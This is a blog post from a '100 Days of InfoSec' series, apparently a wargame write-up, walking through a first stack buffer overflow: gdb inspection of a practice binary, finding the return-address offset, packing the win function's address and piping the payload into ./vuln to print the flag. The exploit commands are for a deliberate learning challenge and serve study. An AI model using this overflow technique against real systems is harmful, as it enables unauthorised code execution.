<html>

<head>
	<meta content="text/html; charset=UTF-8" http-equiv="content-type">
	<title>Day 14</title>
	<style type="text/css">
		@import url('https://themes.googleusercontent.com/fonts/css?kit=-lTUqgJg2dxbe4D7B5DEICbzagQlgiMMTcfwSOywUzNl9RG9jbURsXEdpaTs_nuVaEu-9ATAroJ1iN4zmQ55BvhRIWHYCs49SYMOsUv7zk6e5y_jgzooQLxGkmktvSrg3qZdE9zi-ByOGjQ5t8RO7A');

		ul.lst-kix_2yzjaagjqxah-0 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-8 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-5 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-4 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-7 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-6 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-7 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-8 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-5 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-6 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-3 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-4 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-1 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-2 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-1 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-0 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-3 {
			list-style-type: none
		}

		.lst-kix_2yzjaagjqxah-8>li:before {
			content: "\0025a0  "
		}

		ul.lst-kix_kjisakvjzjsi-2 {
			list-style-type: none
		}

		.lst-kix_5lp3gqbxm2h8-1>li:before {
			content: "\0025cb  "
		}

		.lst-kix_5lp3gqbxm2h8-2>li:before {
			content: "\0025a0  "
		}

		ul.lst-kix_hkg89eyxvtvi-0 {
			list-style-type: none
		}

		.lst-kix_5lp3gqbxm2h8-3>li:before {
			content: "\0025cf  "
		}

		.lst-kix_5lp3gqbxm2h8-4>li:before {
			content: "\0025cb  "
		}

		.lst-kix_5lp3gqbxm2h8-6>li:before {
			content: "\0025cf  "
		}

		.lst-kix_5lp3gqbxm2h8-5>li:before {
			content: "\0025a0  "
		}

		.lst-kix_5lp3gqbxm2h8-8>li:before {
			content: "\0025a0  "
		}

		.lst-kix_5lp3gqbxm2h8-7>li:before {
			content: "\0025cb  "
		}

		ul.lst-kix_hkg89eyxvtvi-1 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-2 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-3 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-4 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-5 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-6 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-7 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-8 {
			list-style-type: none
		}

		.lst-kix_kjisakvjzjsi-0>li:before {
			content: "\0025cf  "
		}

		.lst-kix_i6qpwdhuifir-8>li:before {
			content: "\0025a0  "
		}

		.lst-kix_kjisakvjzjsi-3>li:before {
			content: "\0025cf  "
		}

		.lst-kix_kjisakvjzjsi-4>li:before {
			content: "\0025cb  "
		}

		.lst-kix_kjisakvjzjsi-5>li:before {
			content: "\0025a0  "
		}

		.lst-kix_i6qpwdhuifir-3>li:before {
			content: "\0025cf  "
		}

		.lst-kix_kjisakvjzjsi-7>li:before {
			content: "\0025cb  "
		}

		.lst-kix_i6qpwdhuifir-2>li:before {
			content: "\0025a0  "
		}

		.lst-kix_kjisakvjzjsi-6>li:before {
			content: "\0025cf  "
		}

		.lst-kix_kjisakvjzjsi-8>li:before {
			content: "\0025a0  "
		}

		.lst-kix_i6qpwdhuifir-0>li:before {
			content: "\0025cf  "
		}

		.lst-kix_i6qpwdhuifir-1>li:before {
			content: "\0025cb  "
		}

		.lst-kix_hkg89eyxvtvi-0>li:before {
			content: "\0025cf  "
		}

		.lst-kix_hkg89eyxvtvi-1>li:before {
			content: "\0025cb  "
		}

		.lst-kix_5lp3gqbxm2h8-0>li:before {
			content: "\0025cf  "
		}

		.lst-kix_hkg89eyxvtvi-3>li:before {
			content: "\0025cf  "
		}

		ul.lst-kix_5lp3gqbxm2h8-1 {
			list-style-type: none
		}

		ul.lst-kix_5lp3gqbxm2h8-0 {
			list-style-type: none
		}

		.lst-kix_hkg89eyxvtvi-2>li:before {
			content: "\0025a0  "
		}

		.lst-kix_2yzjaagjqxah-7>li:before {
			content: "\0025cb  "
		}

		.lst-kix_hkg89eyxvtvi-5>li:before {
			content: "\0025a0  "
		}

		ul.lst-kix_i6qpwdhuifir-0 {
			list-style-type: none
		}

		.lst-kix_2yzjaagjqxah-6>li:before {
			content: "\0025cf  "
		}

		ul.lst-kix_i6qpwdhuifir-2 {
			list-style-type: none
		}

		ul.lst-kix_i6qpwdhuifir-1 {
			list-style-type: none
		}

		ul.lst-kix_i6qpwdhuifir-4 {
			list-style-type: none
		}

		.lst-kix_hkg89eyxvtvi-4>li:before {
			content: "\0025cb  "
		}

		ul.lst-kix_i6qpwdhuifir-3 {
			list-style-type: none
		}

		.lst-kix_2yzjaagjqxah-5>li:before {
			content: "\0025a0  "
		}

		ul.lst-kix_i6qpwdhuifir-6 {
			list-style-type: none
		}

		ul.lst-kix_i6qpwdhuifir-5 {
			list-style-type: none
		}

		ul.lst-kix_i6qpwdhuifir-8 {
			list-style-type: none
		}

		ul.lst-kix_i6qpwdhuifir-7 {
			list-style-type: none
		}

		.lst-kix_2yzjaagjqxah-2>li:before {
			content: "\0025a0  "
		}

		.lst-kix_2yzjaagjqxah-4>li:before {
			content: "\0025cb  "
		}

		.lst-kix_hkg89eyxvtvi-7>li:before {
			content: "\0025cb  "
		}

		.lst-kix_i6qpwdhuifir-4>li:before {
			content: "\0025cb  "
		}

		.lst-kix_hkg89eyxvtvi-6>li:before {
			content: "\0025cf  "
		}

		.lst-kix_2yzjaagjqxah-3>li:before {
			content: "\0025cf  "
		}

		ul.lst-kix_5lp3gqbxm2h8-5 {
			list-style-type: none
		}

		.lst-kix_i6qpwdhuifir-5>li:before {
			content: "\0025a0  "
		}

		.lst-kix_i6qpwdhuifir-6>li:before {
			content: "\0025cf  "
		}

		ul.lst-kix_5lp3gqbxm2h8-4 {
			list-style-type: none
		}

		ul.lst-kix_5lp3gqbxm2h8-3 {
			list-style-type: none
		}

		.lst-kix_kjisakvjzjsi-2>li:before {
			content: "\0025a0  "
		}

		.lst-kix_2yzjaagjqxah-0>li:before {
			content: "\0025cf  "
		}

		ul.lst-kix_5lp3gqbxm2h8-2 {
			list-style-type: none
		}

		.lst-kix_kjisakvjzjsi-1>li:before {
			content: "\0025cb  "
		}

		.lst-kix_i6qpwdhuifir-7>li:before {
			content: "\0025cb  "
		}

		ul.lst-kix_5lp3gqbxm2h8-8 {
			list-style-type: none
		}

		.lst-kix_hkg89eyxvtvi-8>li:before {
			content: "\0025a0  "
		}

		ul.lst-kix_5lp3gqbxm2h8-7 {
			list-style-type: none
		}

		.lst-kix_2yzjaagjqxah-1>li:before {
			content: "\0025cb  "
		}

		ul.lst-kix_5lp3gqbxm2h8-6 {
			list-style-type: none
		}

		ol {
			margin: 0;
			padding: 0
		}

		table td,
		table th {
			padding: 0
		}

		.c13 {
			padding-top: 0pt;
			padding-bottom: 0pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: left;
			height: 11pt
		}

		.c1 {
			color: #6a9955;
			font-weight: 400;
			text-decoration: none;
			vertical-align: baseline;
			font-size: 10.5pt;
			font-family: "Courier New";
			font-style: normal
		}

		.c9 {
			color: #000000;
			font-weight: 300;
			text-decoration: none;
			vertical-align: baseline;
			font-size: 14pt;
			font-family: "Roboto Mono";
			font-style: normal
		}

		.c10 {
			color: #000000;
			font-weight: 400;
			text-decoration: none;
			vertical-align: baseline;
			font-size: 14pt;
			font-family: "Roboto Mono";
			font-style: normal
		}

		.c3 {
			background-color: #1e1e1e;
			padding-top: 12pt;
			padding-bottom: 12pt;
			line-height: 1.3571428571428572;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		.c0 {
			color: #000000;
			font-weight: 400;
			text-decoration: none;
			vertical-align: baseline;
			font-size: 14pt;
			font-family: "Montserrat";
			font-style: normal
		}

		.c5 {
			padding-top: 14pt;
			padding-bottom: 4pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: left;
			height: 14pt
		}

		.c7 {
			color: #434343;
			font-weight: 400;
			text-decoration: none;
			vertical-align: baseline;
			font-size: 14pt;
			font-family: "Montserrat";
			font-style: normal
		}

		.c2 {
			padding-top: 12pt;
			padding-bottom: 12pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: left;
			height: 11pt
		}

		.c4 {
			padding-top: 12pt;
			padding-bottom: 12pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		.c15 {
			padding-top: 0pt;
			padding-bottom: 0pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: center
		}

		.c18 {
			padding-top: 14pt;
			padding-bottom: 4pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: right
		}

		.c16 {
			padding-top: 14pt;
			padding-bottom: 4pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		.c6 {
			font-size: 18pt;
			font-family: "Montserrat";
			color: #000000;
			font-weight: 900
		}

		.c17 {
			font-size: 14pt;
			font-family: "Montserrat";
			color: #000000;
			font-weight: 700
		}

		.c11 {
			font-size: 14pt;
			font-family: "Roboto Mono";
			font-weight: 300
		}

		.c14 {
			background-color: #ffffff;
			max-width: 600pt;
			padding: 72pt 72pt 72pt 72pt;
			margin: auto
		}

		.c12 {
			font-family: "Montserrat";
			color: #000000;
			font-weight: 800
		}

		.c8 {
			font-size: 14pt;
			font-family: "Montserrat";
			font-weight: 400
		}

		.title {
			padding-top: 0pt;
			color: #000000;
			font-size: 26pt;
			padding-bottom: 3pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		.subtitle {
			padding-top: 0pt;
			color: #666666;
			font-size: 15pt;
			padding-bottom: 16pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		li {
			color: #000000;
			font-size: 11pt;
			font-family: "Arial"
		}

		p {
			margin: 0;
			color: #000000;
			font-size: 11pt;
			font-family: "Arial"
		}

		h1 {
			padding-top: 20pt;
			color: #000000;
			font-size: 20pt;
			padding-bottom: 6pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h2 {
			padding-top: 18pt;
			color: #000000;
			font-size: 16pt;
			padding-bottom: 6pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h3 {
			padding-top: 16pt;
			color: #434343;
			font-size: 14pt;
			padding-bottom: 4pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h4 {
			padding-top: 14pt;
			color: #666666;
			font-size: 12pt;
			padding-bottom: 4pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h5 {
			padding-top: 12pt;
			color: #666666;
			font-size: 11pt;
			padding-bottom: 4pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h6 {
			padding-top: 12pt;
			color: #666666;
			font-size: 11pt;
			padding-bottom: 4pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			font-style: italic;
			orphans: 2;
			widows: 2;
			text-align: left
		}
	</style>
</head>

<body class="c14">
	<h3 class="c18" id="h.3zvpwyx0el37"><span class="c6">14</span><span
			class="c6"><br>/<br>100<br>Days<br>Of<br>InfoSec</span>
		<hr>
	</h3>
	<h3 class="c16" id="h.qwvdajocmuel"><span class="c12">Wargames &mdash; &nbsp;</span><span class="c17">first
			overflow</span></h3>
	<p class="c4"><span
			style="overflow: hidden; display: inline-block; margin: 0.00px 0.00px; border: 0.00px solid #000000; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px); width: 588.00px; height: 820.00px;"><img
				alt="" src="images/image4day14.png"
				style="width: 1458.34px; height: 820.00px; margin-left: 0.00px; margin-top: 0.00px; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px);"
				title=""></span></p>
	<p class="c4"><span class="c0">No sigsegv function, but there&rsquo;s &nbsp;a win function. For the win function to
			be called, the buffer needs to be overflowed in a way such that the return address holds the address of the
			win function. That way, when the vuln function exits, the program goes the win function and prints the
			flag.</span></p>
	<p class="c4"><span class="c0">&gt;&gt;&gt; I opened thee program in gdb and looked at the address of the first
			address of the win function &nbsp;</span></p>
	<p class="c4"><span class="c11">Disassemble win</span><span class="c8">&nbsp; &nbsp; &nbsp; &nbsp;</span><span
			class="c9">//;0x08048616 </span></p>
	<p class="c4"><span class="c0">This is what needs to be written in the return address</span></p>
	<p class="c4"><span
			style="overflow: hidden; display: inline-block; margin: 0.00px 0.00px; border: 0.00px solid #000000; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px); width: 623.00px; height: 344.00px;"><img
				alt="" src="images/image1day14.png"
				style="width: 1661.33px; height: 934.00px; margin-left: -0.00px; margin-top: -68.00px; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px);"
				title=""></span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c4"><span class="c0">&gt;&gt;&gt; I also disassembled vuln function and put a breakpoint before the buffer
			is written ie before the gets call in vuln ( )</span></p>
	<p class="c4"><span class="c9">Disassemble vuln</span></p>
	<p class="c4"><span class="c9">b *0x080486a9</span></p>
	<p class="c4"><span
			style="overflow: hidden; display: inline-block; margin: 0.00px 0.00px; border: 0.00px solid #000000; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px); width: 615.00px; height: 353.00px;"><img
				alt="" src="images/image3day14.png"
				style="width: 1818.77px; height: 1024.40px; margin-left: 0.00px; margin-top: -671.40px; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px);"
				title=""></span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c4"><span class="c0">&gt;&gt;&gt; Note: the return address currently is the address of the next
			instruction in main after the call to the vuln function</span></p>
	<p class="c4"><span class="c0">You can know this address either by disassembling main and seeing the next address
			after the vuln function call or by typing the command &lsquo;where&rsquo; when the program stops at the
			breakpoint</span></p>
	<p class="c4"><span class="c0">This shows you where you are and what the next return address is</span></p>
	<p class="c4"><span
			style="overflow: hidden; display: inline-block; margin: 0.00px 0.00px; border: 0.00px solid #000000; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px); width: 612.37px; height: 148.50px;"><img
				alt="" src="images/image2day14.png"
				style="width: 1910.60px; height: 1073.18px; margin-left: 0.00px; margin-top: -577.16px; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px);"
				title=""></span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c4"><span class="c0">&gt;&gt;&gt; Now I wanted to see the stack and see if I could find the return
			address. This way I could know how much buffer there is to overflow before the return address</span></p>
	<p class="c4"><span class="c11">x /40xw $esp</span><span class="c8">&nbsp;</span><span class="c9">//; to see 40
			words from the ESP</span></p>
	<p class="c4"><span
			style="overflow: hidden; display: inline-block; margin: 0.00px 0.00px; border: 0.00px solid #000000; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px); width: 603.61px; height: 175.50px;"><img
				alt="" src="images/image9day14.png"
				style="width: 1627.16px; height: 919.41px; margin-left: 0.00px; margin-top: -602.46px; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px);"
				title=""></span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c4"><span class="c0">&gt;&gt;&gt; One method could be to calculate the exact number of characters &nbsp;to
			overflow the buffer. However, I chose a different technique by sending arbitrary characters and seeing which
			ones overflowed the return address</span></p>
	<p class="c4"><span class="c9">AAAAAAAAAASSSSSSSSSSDDDDDDDDDDFFFFFFFFFFGGGGGGGGGGHHHHHHHHHH</span></p>
	<p class="c4"><span
			style="overflow: hidden; display: inline-block; margin: 0.00px 0.00px; border: 0.00px solid #000000; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px); width: 617.00px; height: 524.00px;"><img
				alt="" src="images/image7day14.png"
				style="width: 1241.96px; height: 698.00px; margin-left: 0.00px; margin-top: -168.00px; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px);"
				title=""></span></p>
	<p class="c4"><span class="c9">Where &nbsp; &nbsp;//; to see the first return address</span></p>
	<p class="c4"><span
			style="overflow: hidden; display: inline-block; margin: 0.00px 0.00px; border: 0.00px solid #000000; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px); width: 618.50px; height: 214.10px;"><img
				alt="" src="images/image5day14.png"
				style="width: 2093.12px; height: 1175.83px; margin-left: 0.00px; margin-top: -961.73px; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px);"
				title=""></span></p>
	<p class="c4"><span class="c11">x /40xw $esp</span><span class="c8">&nbsp;</span><span class="c9">//; to see 40
			words from the ESP</span></p>
	<p class="c4"><span
			style="overflow: hidden; display: inline-block; margin: 0.00px 0.00px; border: 0.00px solid #000000; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px); width: 633.45px; height: 206.50px;"><img
				alt="" src="images/image6day14.png"
				style="width: 1735.66px; height: 979.48px; margin-left: 0.00px; margin-top: -772.98px; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px);"
				title=""></span></p>
	<p class="c2"><span class="c9"></span></p>
	<p class="c4"><span class="c0">&gt;&gt;&gt;&gt; The return address was 0x47474747 or GGGG</span></p>
	<p class="c4"><span class="c8">Over flowed characters &nbsp;just before the ret address :<br></span><span
			class="c9">AAAAAAAAAASSSSSSSSSSDDDDDDDDDDFFFFFFFFFFGGGG</span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c4"><span class="c0">&gt;&gt;&gt; Return address in little endian format :</span></p>
	<p class="c4"><span class="c9">pip install pwntools</span></p>
	<p class="c4"><span class="c9">python<br> &nbsp;from pwn import *<br> &nbsp;p32(0x8048616)</span></p>
	<p class="c4"><span class="c9">Or</span></p>
	<p class="c4"><span class="c9">python<br>struct.pack(&ldquo;&lt;I&rdquo;, 0x08048616)</span></p>
	<p class="c3"><span class="c1">\x16\x86\x04\x08</span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c2"><span class="c0"></span></p>
	<p class="c4"><span class="c8">&gt;&gt;&gt; Sending the payload into the program using python -c</span></p>
	<p class="c4"><span class="c9">Python -c
			&ldquo;print(&lsquo;AAAAAAAAAASSSSSSSSSSDDDDDDDDDDFFFFFFFFFFGGGG&rsquo;<br>+&rsquo;\x16\x86\x04\x08&rsquo;)&rdquo;
			| ./vuln</span></p>
	<p class="c4"><span
			style="overflow: hidden; display: inline-block; margin: 0.00px 0.00px; border: 0.00px solid #000000; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px); width: 612.71px; height: 108.50px;"><img
				alt="" src="images/image8day14.png"
				style="width: 1892.68px; height: 1068.60px; margin-left: -943.31px; margin-top: -97.33px; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px);"
				title=""></span></p>
	<p class="c13"><span class="c10"></span></p>
	<p class="c13"><span class="c10"></span></p>
	<h3 class="c5" id="h.dardaoz37s2v"><span class="c7"></span></h3>
	<hr>
	<p class="c15"><span class="c0">
		<a href='/100days/day3.html'>Previous</a>
		&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
		<a href='/100days/'>Home</a>
		&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
		<a href='/100days/day15.html'>Next</a>
	</span>
	</p>
</body>

</html>